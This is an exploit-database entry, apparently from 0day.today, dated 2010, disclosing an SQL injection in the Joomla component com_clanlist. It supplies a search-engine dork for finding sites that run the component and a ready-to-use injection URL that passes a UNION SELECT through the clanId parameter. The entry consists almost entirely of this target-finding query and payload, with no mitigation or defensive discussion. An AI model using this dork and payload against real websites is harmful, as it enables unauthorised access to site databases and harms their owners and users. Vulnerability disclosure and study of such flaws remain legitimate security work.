id: 14768
date: 11/09/2010
title: Joomla Component com_clanlist SQL Injection Vulnerability
author: CoBRa_21
cves: 

=========================================================
Joomla Component com_clanlist SQL Injection Vulnerability
=========================================================

Author : CoBRa_21
 
Dork : inurl:com_clanlist
 
 
########################################################################################
  
Sql Injection :
 
http://localhost/[path]/index.php?option=com_clanlist&clanId=-999 union select version()
 
########################################################################################



#  0day.today [2023-03-26]  #